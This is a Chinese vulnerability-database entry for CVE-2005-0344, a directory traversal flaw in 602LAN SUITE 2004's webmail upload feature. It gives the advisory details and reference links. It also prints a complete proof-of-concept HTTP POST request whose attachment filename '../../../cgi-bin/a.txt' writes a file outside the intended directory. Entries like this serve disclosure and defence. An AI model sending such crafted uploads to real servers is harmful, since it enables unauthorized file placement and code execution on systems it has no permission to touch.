602LAN SUITE 目录遍历漏洞

602LAN SUITE 目录遍历漏洞

漏洞ID 1108442 漏洞类型 路径遍历
发布时间 2005-02-08 更新时间 2005-05-02
图片[1]-602LAN SUITE 目录遍历漏洞-安全小百科CVE编号 CVE-2005-0344
图片[2]-602LAN SUITE 目录遍历漏洞-安全小百科CNNVD-ID CNNVD-200505-457
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25092
https://www.securityfocus.com/bid/90294
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-457
|漏洞详情
602LANSUITE2004.0.04.1221中存在目录遍历漏洞,允许远程验证用户通过filename参数中的..(参数中包含’..’)来上传和执行任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/12495/info

602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server.

This vulnerability could lead to the execution of a malicious file on the server hosting the application.

602 Lan Suite 2004 version 2004.0.04.1221 is reportedly vulnerable; other versions may also be affected. 

POST /mail HTTP/1.0
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------287661860715985
Content-length: 540

-----------------------------287661860715985
Content-Disposition: form-data; name="U"

6E13745843714258F86310B04D7
-----------------------------287661860715985
Content-Disposition: form-data; name="A"

ATTACHMENTS
-----------------------------287661860715985
Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"
Content-Type: text/plain

Test File
-----------------------------287661860715985
Content-Disposition: form-data; name="ATTACH"

Attach
-----------------------------287661860715985--
|受影响的产品
Software602 602Lan Suite 2004.0.04.1221
|参考资料

来源:MISC
链接:http://www.security.org.sg/vuln/602lansuite1221.html
来源:SECUNIA
名称:14169
链接:http://secunia.com/advisories/14169/
来源:BUGTRAQ
名称:20050208[SIG^2G-TEC]602LANSUITEWebMailVulnerabilityAllowsFileUploadtoArbitraryDirectories
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110793103506620&w;=2
来源:XF
名称:602lansuite-webmail-directory-traversal(19258)
链接:http://xforce.iss.net/xforce/xfdb/19258
来源:SECTRACK
名称:1013106
链接:http://securitytracker.com/id?1013106

相关推荐: mime-support run-mailcap覆盖文件漏洞

mime-support run-mailcap覆盖文件漏洞 漏洞ID 1202861 漏洞类型 未知 发布时间 2003-05-12 更新时间 2003-05-12 CVE编号 CVE-2003-0214 CNNVD-ID CNNVD-200305-027 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享